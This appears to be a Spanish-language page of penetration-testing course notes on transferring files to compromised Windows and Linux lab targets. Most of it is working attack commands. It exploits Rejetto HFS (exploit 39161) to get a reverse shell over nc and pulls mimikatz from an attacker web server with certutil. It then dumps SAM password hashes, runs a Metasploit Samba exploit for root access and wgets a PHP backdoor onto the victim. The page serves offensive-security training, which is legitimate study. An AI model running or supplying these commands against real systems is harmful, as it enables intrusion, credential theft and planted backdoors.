Transferring Files

Transferring Files To Windows & Linux Targets

Setting Up A Web Server With Python

Transferring Files To Target Systems

Después de obtener acceso inicial a un sistema de destino, deberá transferir archivos a dicho sistema.

En algunos casos, no tendrá acceso al sistema de destino a través de una sesión de Meterpreter y, como resultado, deberá utilizar las utilidades específicas del sistema operativo incorporadas para facilitar la transferencia de archivos desde su sistema al sistema de destino.

Este proceso utiliza un enfoque de dos pasos, en el que deberá alojar los archivos que desea transferir en un servidor web y descargar los archivos alojados en el servidor web al sistema de destino.

Setting Up A Web Server With Python

Python viene con un módulo integrado conocido como SimpleHTTPServer(python2) y http.server (python3), que se puede utilizar para facilitar un servidor HTTP simple que le proporcione controladores de solicitudes GET y HEAD estándar.

Este módulo se puede utilizar para alojar archivos en cualquier directorio de su sistema y se puede implementar a través de un solo comando en su terminal.

Demo: Setting Up A Web Server With Python

cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
ls

# Creado un servidor http con python 2
python -m SimpleHTTPServer 80

# Creado un servidor http con python 3
python3 -m http.server 80

Quiz: Setting Up A Web Server With Python

Transferring Files To Windows Targets

Demo: Transferring Files To Windows Targets

nmap -sV -p 80 10.2.30.185
searchsploit rejetto

searchsploit -m 39161
vim 39161.py
# Configurar el archivo deacuerdo al ambiente
# configurar IP / puerto


# Atacante
cd /usr/share/windows-binaries
python3 -m http.server 801

python 39161.py 10.2.30.185 801

nc -nvlp 1234
whoami
whoami /priv

# Trasnferimos el mimikatz
cd <Path Mimikatz .exe>
python3 -m http.server 80
# Descarcargar con windows
certutil -urlcache -f http://10.10.5.2/mimikatz.exe  mimikatz.exe

# Vovlado de hash
.\mimikatz.exe
privilege::debug
lsadump::sam

Quiz: Transferring Files To Windows Targets

Transferring Files To Linux Targets

Demo: Transferring Files To Linux Targets

# Obtener acceso al objetivo
nmap -sV 192.196.45.3

# tmux, es una herrramienta que te permite abrir multiples terminales
# Control B o C, abrira una nueva terminal


msf5 > setg RHOSTS 192.196.45.3
msf5 > search samba
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options
msf5 exploit(linux/samba/is_known_pipename) > exploit

/bin/bash -i
root@victim-l:/tmp# cat /etc/*release

# Configuramos python para transferir
cd /usr/share/webshells/php
pyhon3 -m http.server 80

# Descargar desde una URL en Linux
wget http://192.196.45.2/php-backdoor.php

Quiz: Transferring Files To Linux Targets

PreviousLinux Enumeration NextShells

Last updated 9 months ago